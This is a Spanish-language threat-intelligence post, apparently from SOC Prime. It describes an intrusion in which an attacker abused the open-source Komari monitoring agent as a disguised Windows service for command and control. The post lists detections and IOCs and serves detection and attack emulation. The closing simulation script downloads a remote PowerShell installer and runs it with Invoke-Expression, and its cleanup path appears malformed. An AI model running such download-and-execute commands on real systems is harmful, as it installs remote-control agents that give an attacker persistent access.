SOC Prime Bias: Crítico

30 Apr 2026 14:19 UTC

Komari: La herramienta de «monitoreo» que no necesitaba ser armada

Author Photo
SOC Prime Team linkedin icon Seguir
Komari: La herramienta de «monitoreo» que no necesitaba ser armada
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Un actor de amenazas utilizó credenciales de VPN robadas para acceder a una estación de trabajo de Windows de un socio de Huntress, luego habilitó RDP y desplegó el agente de monitoreo de código abierto Komari como un servicio a nivel de SISTEMA disfrazado como Servicio de Actualización de Windows a través de NSSM. Una vez instalado, el agente estableció una conexión persistente de WebSocket con la infraestructura controlada por el atacante y proporcionó capacidades como ejecución de comandos, acceso a terminal y comprobaciones de conexión de tipo latido. En la práctica, la herramienta funcionó como un marco ligero de comando y control sin requerir adicional armamento.

Investigación

La intrusión comenzó con un inicio de sesión en la VPN SSL que se originó desde 45.153.34.132, seguido por el uso del smbexec.py de Impacket para habilitar RDP y ejecutar una serie de comandos remotos. Los investigadores encontraron que una línea de comando de PowerShell descargó el instalador de Komari directamente desde GitHub y lo registró como un servicio de Windows. Ese servicio luego lanzó komari-agent.exe, abrió una sesión de WebSocket al servidor del atacante y habilitó la ejecución de comandos remotos arbitrarios en el host.

Mitigación

Huntress respondió aislando la estación de trabajo comprometida, deshabilitando la cuenta de usuario afectada y deteniendo el servicio Komari creado por NSSM. La conexión maliciosa de WebSocket fue bloqueada y el mecanismo de persistencia fue eliminado del sistema. Las defensas de seguimiento recomendadas incluyen endurecer los controles de acceso a la VPN, monitorear la creación de servicios sospechosos, inspeccionar la actividad de WebSocket saliente, y fortalecer la seguridad de RDP.

Respuesta

Los defensores deberían detectar la creación de un servicio de Windows llamado Servicio de Actualización de Windows que apunta a komari-agent.exe, monitorizar conexiones de WebSocket salientes de larga duración a hosts desconocidos, y alertar sobre el uso de herramientas Impacket como smbexec.py para movimiento lateral. Si se identifica, el punto final afectado debe ser contenido inmediatamente, revocadas las credenciales comprometidas y el servicio malicioso eliminado del entorno.

Flujo de Ataque

Detecciones

Posibles Patrones de Línea de Comando de Impacket (vía cmdline)

Equipo SOC Prime
30 abr 2026

Posible Ejecución Remota de Código usando Impacket (vía cmdline)

Equipo SOC Prime
30 abr 2026

Powershell Ejecutando Archivo en Directorio Sospechoso Usando Política de Ejecución Bypass (vía cmdline)

Equipo SOC Prime
30 abr 2026

Descarga o Carga a través de Powershell (vía cmdline)

Equipo SOC Prime
30 abr 2026

Posible Sombreado de Servicios de Escritorio Remoto (vía creación de proceso)

Equipo SOC Prime
30 abr 2026

Modificaciones de Firewall Sospechosas vía CLI (vía cmdline)

Equipo SOC Prime
30 abr 2026

Proceso Sospechoso Utiliza una URL en la Línea de Comando (vía cmdline)

Equipo SOC Prime
30 abr 2026

Software Alternativo de Acceso Remoto / Gestión (vía creación de proceso)

Equipo SOC Prime
30 abr 2026

IOCs (HashSha256) para detectar: Komari: La herramienta de “Monitoreo” que no necesitó armamento

Reglas de IA de SOC Prime
30 abr 2026

IOCs (SourceIP) para detectar: Komari: La herramienta de “Monitoreo” que no necesitó armamento

Reglas de IA de SOC Prime
30 abr 2026

IOCs (DestinationIP) para detectar: Komari: La herramienta de “Monitoreo” que no necesitó armamento

Reglas de IA de SOC Prime
30 abr 2026

Detección de Ejecución smbexec.py y cmd.exe de Impacket vía RDP [Creación de Procesos de Windows]

Reglas de IA de SOC Prime
30 abr 2026

Ejecución de PowerShell para la Instalación del Agente Komari [Windows PowerShell]

Reglas de IA de SOC Prime
30 abr 2026

Detectar Persistencia del Agente Komari vía Servicio de Actualización de Windows [Sistema Windows]

Reglas de IA de SOC Prime
30 abr 2026

Detección de Acceso No Autorizado a SSLVPN y Actividad Post-Compromiso [Firewall]

Reglas de IA de SOC Prime
30 abr 2026

Ejecución de Simulación

Prerequisito: El Control de Pre-vuelo de Telemetría & Base debe haber pasado.

  • Narrativa del Ataque y Comandos:
    Un adversario ha obtenido una postura en un host Windows y desea instalar el agente C2 de Komari para mantener persistencia y luego volcar credenciales (T1003.001). Para evitar desencadenar defensas tradicionales contra scripts, el atacante ejecuta PowerShell con -ExecutionPolicy Bypass y descarga directamente el instalador del repositorio público de GitHub. La línea de comando coincide exactamente con la regla de detección, generando la telemetría esperada.

  • Script de Prueba de Regresión:

    # Simulación de Instalación del Agente Komari
    $url = "https://raw.githubusercontent.com/komari-monitor/komari-agent/main/install.ps1"
    $script = (New-Object System.Net.WebClient).DownloadString($url)
    Invoke-Expression $script
  • Comandos de Limpieza:

    # Elimine cualquier archivo creado por el instalador simulado (si lo hay)
    Remove-Item -Path "$Env:ProgramFilesKomari" -Recurse -Force -ErrorAction SilentlyContinue
    # Detenga cualquier proceso Komari que pueda haber sido iniciado
    Get-Process -Name "Komari" -ErrorAction SilentlyContinue | Stop-Process -Force